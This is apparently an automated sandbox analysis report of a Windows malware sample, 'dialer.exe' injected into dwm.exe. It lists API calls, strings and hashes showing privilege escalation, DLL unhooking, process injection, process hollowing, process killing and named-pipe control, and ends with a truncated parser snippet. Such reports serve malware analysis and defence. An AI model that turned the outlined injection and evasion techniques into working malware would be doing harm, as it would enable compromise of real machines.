                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F518A0
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: a1110054fa346980828b07f09b404bb4081c8b8a7b8c07b74fb48bab85e4b3c3
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 4B310F6920264151FF50DB66D6693A923A6BF85FD0F08D4318E0987295FF34EE73C311

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph not recoverable; block/edge list condensed). Basic blocks span 283e0f52b2c-283e0f52f03. API calls on the graph: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: ab0d64a5416b57942df9a7c973dfc803437d304260f5776b799f0c733712809b
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: CBB1E32A212A4082EFA9CFA5D46876973A4FF66F94F04D136EE0953794DF34CE62C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: e6e0de8a53571f7540c7d917c7a984e075afd5abad5c7e0965ce991b2570c8f0
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 62315D76206B848AEB60DF60F8643ED7364FB84B44F44802ADA4D57B94EF38CA59C750
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 56beb5a61bd6c6a2183787bf793ff039cda336b94d6471ce9543db9c649f1505
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: EA31933A215F8086EB60CF65E85439E73A0FB89B54F504135EE9D43B54DF38C666CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: dfa00ffd4f990c4f5113f75cc1f8cea44e1a31c95c2910c771efd7c6427a0543
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 91515D7A201B8986EB50CF62F56835A77A2FB8AF89F048134DE4947718DF3CC666C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 606f4f3faa3cbb741394662a736617162935932ec5c725c39a3b0e4e04a2b483
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: C131C26C51390EA0EE41EBE6E8796D83321BF60F54F84C2339C4906165DF788B6BC390
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 9a7ccc4cd1133da96cf4ac9f49060de58e06fddbcc3ddfb5dacba703af430f5f
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 9681BD2DA0764386FA50EB65A4793992290FF85F80F54C035AE4597796EF3CCB778700
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000283E0F5CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CEBC
                                                        • SetLastError.KERNEL32 ref: 00000283E0F5CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000283E0F5ECCC,?,?,?,?,00000283E0F5BF9F,?,?,?,?,?,00000283E0F57AB0), ref: 00000283E0F5CF2C
                                                          • Part of subcall function 00000283E0F5D6CC: HeapAlloc.KERNEL32 ref: 00000283E0F5D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF54
                                                          • Part of subcall function 00000283E0F5D744: HeapFree.KERNEL32 ref: 00000283E0F5D75A
                                                          • Part of subcall function 00000283E0F5D744: GetLastError.KERNEL32 ref: 00000283E0F5D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF76
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 1b47c9e040abab68aa1d397b5cd4bb9b00ee88e7548c2a4a3269aeabd1c7f97e
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: CB41522C2036444AFE68E7B5557E36912827F45FB0F18C734AD37466E6EE388E678341
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: f43e96a90b51b68ac820b5b4abb326bf94aba3e574739f3afe73f9b56cd1341b
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 32216D7A61564592EB10CB25F46835D73A0FB99BA4F508325EE5902AA8CF3CC65ACB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 9fc6c4aca0bf53e8ee9ca2f0312d5538c165fe904540e63dc6119d7f68fa6e9f
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: F4E1F73A60AB4086FB60DF75D46839D37A0FB45F98F508525EE8957B95CF38C6A2C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: fa33bcb6df7b1f7ba3df27837f311f8addd876b0ec84dfe298328115fa8ce443
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: E1E1BF7A606B408AEF24CFA5D49839D77A0FF45B98F148125EE8957B95CF34CAB2C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 75ffc23d5b7f83b5f0d6e74488fd465ccee52c3f21be2ee577a11624937de4d3
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 5041C62A313A0092FF15CB96E82875A2395BF45FA0F49C1359D0E97785EE3CCA6B8340
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 37ed4835efbd7119e0cd2d04a26a71f40f28254fb457e385f341ad7f073071ae
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 4341AE76215B84C6EB60CF61E45839EB7A5F789F88F008129DF8907758DF38D956CB40
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: e818e627de6c27ee5714dbca7341a896abf6c9e77f7e00c65e6f48a546612a6e
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 23114F2860764442FE78E7A5657936961467F44FF0F18C3349C69466EADE38CE638301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: d81f0619044b56284d1e565a3abb554c1abcafa6cb00437318b84599a0bbdce8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: F9818D68A1274286FE50DBAAB4793996690BF85F80F18C435AD0447796EF38CF678700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        • Instruction Fuzzy Hash: B3618E3B606B848AEB20DF65D45439D77A0FB48F88F048625EF4917B99DF38D6A6C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a9f0133d41d0d228be6ec06c1aa0a3e3186ae70ebb8d60e1de791dff854b27ec
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 30510A3A20678141EEA5CAE9A07C36A6751FBA6F40F448235DD4903B4ADE39CF27C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: f66aa5a089738768f42d768ca52fc4165fdf5837331f264d38b5cb1d7558303f
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 8841A276616A8482DB60DF25F8587AD67A0FB98B94F448031EE4D87794DF3CC652C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 10dab0dbe0d866a7a504ba6f5cfa1d3c6f2f125a8ce7fe2dc7f59effd429f855
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 90112B3621AB8482EB65CB15F45435977E5FB88F94F588224EE8C07758EF3CCA62CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 19036c8eb49a69913a7b84f8cf4a2f8ce2b50df7a00b8f34d4accafcd1f8e2b9
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 8BE04F61642B48D0DB018F61E85429833A0AB98F64B58D1229D5C06311EA3CD2FAC300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: bd845fa433a597fe5a53f3b145a4a539bf31b9f4464573d0fb0a28a00d6a336c
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: E7E04F61602B48C0DB018F61D4502986360AB98F64B88D122CD4C06311EA3CD2E6C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: f84b5b760ee03c72493453056a8e348c52b4e63ccdb7a77c19520233936ac078
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 89119129602B4481EE44DBA6A81C26973A1FF89FC0F188038DE4D83766DF39D963D340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: a108fc7276635cc9c5bf77220be23e4a0a35c7081bde076d44722fef64797e29
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: D8E039B960260986EB04CB62E82834A37E1FB8AF06F04C0248D0947351DF7DC5AAD790

                                                        Execution Graph

                                                        Execution Coverage:48.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:226
                                                        Total number of Limit Nodes:22
The rendered execution graph of dialer.exe (process 63) arrived as one run of node and edge tokens. Its content, the API calls recorded per function in node order with callees named by address, is:

• 140002258 (entry): 140001f2c called twice; GetCurrentProcessId, OpenProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges (GetLastError on failure), CloseHandle; FindResourceExA, SizeofResource, LoadResource, LockResource, GetCurrentProcessId; 1400017ec; RegCreateKeyExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegSetKeySecurity, LocalFree, RegCreateKeyExW, GetCurrentProcessId, RegSetValueExW, RegCloseKey; CreateThread, GetProcessHeap, HeapAlloc, CreateThread, CreateThread, then a SleepEx loop. A failed resource lookup ends in ExitProcess. Its strings (see below) include SeDebugPrivilege, SOFTWARE\dialerconfig, pid and the SDDL string D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA).
• 140001f2c (called twice from the entry, whose strings include ntdll.dll and kernel32.dll): StrCpyW, StrCatW, GetModuleHandleW, GetCurrentProcess, K32GetModuleInformation, CreateFileW, CreateFileMappingW, MapViewOfFile, lstrcmpiA, VirtualProtect, VirtualProtect, CloseHandle, CloseHandle, FreeLibrary. With its strings C:\Windows\System32\ and .text this is the sequence that maps a system DLL from disk and rewrites the loaded copy's .text section, i.e. restoring unhooked code from the file.
• 1400010c0 (target check and injection): 1400018ac (OpenProcess, IsWow64Process, CloseHandle); OpenProcess, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle, StrCmpIW, NtQueryInformationProcess, OpenProcessToken, GetTokenInformation, GetLastError, LocalAlloc, GetTokenInformation, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree, CloseHandle, StrStrA, VirtualAllocEx, WriteProcessMemory, 14000211c (GetModuleHandleA, GetProcAddress), WaitForSingleObject, GetExitCodeThread, CloseHandle. Its strings are MSBuild.exe, ReflectiveDllMain and dialer.exe: the candidate's image name and token SID are examined, a buffer is written into it, and a thread result is awaited.
• 140001b54: AllocateAndInitializeSid, SetEntriesInAclW, LocalAlloc, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, CreateNamedPipeW (a named pipe with an explicitly built DACL).
• 140002bf8 and 1400021d0 (two pipe server loops): 140001b54; Sleep, ConnectNamedPipe, ReadFile, Sleep, DisconnectNamedPipe, repeated. 140002bf8 hands what it reads to 140002524 (WriteFile, and 1400010c0 on one branch).
• 140002b38: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, K32EnumProcesses, SleepEx loop; per process 140002540, which reaches 1400010c0.
• 140002560 (reads its input with ReadFile, partly through 140001944, and branches): K32EnumProcesses then 1400010c0; RegOpenKeyExW, RegDeleteValueW, then 1400019c4 (SysAllocString, SysAllocString, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, VariantInit, CoUninitialize, SysFreeString, SysFreeString) and 14000175c; ShellExecuteW; 14000217c (GetModuleHandleA, GetProcAddress); ReadFile, lstrlenW, then 140002a90 (CreateFileW, WriteFile, WriteFile, CloseHandle) or 140001c88; 1400018ac, 1400014d8, 1400016cc; ExitProcess on one branch.
• 140001c88: CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread (a new process is created, written to, and its initial thread redirected); an alternative branch is OpenProcess, TerminateProcess.
• 1400017ec: 1400014d8, then in a loop OpenProcess, TerminateProcess, CloseHandle; heap buffer freed afterwards.
• 1400014d8: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, K32EnumProcesses, then per process OpenProcess, K32EnumProcessModules, ReadProcessMemory, CloseHandle; buffers released with RtlFreeHeap.
• 14000175c: 1400014d8, then per process 1400016cc (OpenProcess, 14000211c, CloseHandle).
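The execution graph is emitted as one run of node and edge tokens, which is awkward to read by eye. The parser below is an added example, not code from the sample or from Joe Sandbox: it turns such a dump into a node table and an edge list and walks the edges from a chosen node to list the APIs reachable from it. The embedded input is copied from this report's graph (the fragments for 140001b54 and 140001c88); the address pattern and the set of non-API filler words are assumptions about the dump format drawn from this page only.

```python
"""Parse a Joe Sandbox 'execution_graph' text dump and list the APIs a function reaches.

Added example for this report; not code from the sample or from Joe Sandbox.
Format as seen on this page: a node is '<id> <hex address> [labels...]', an edge
is '<id>-><id>', and labels are API names mixed with filler such as '30 API calls'.
"""
import re

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
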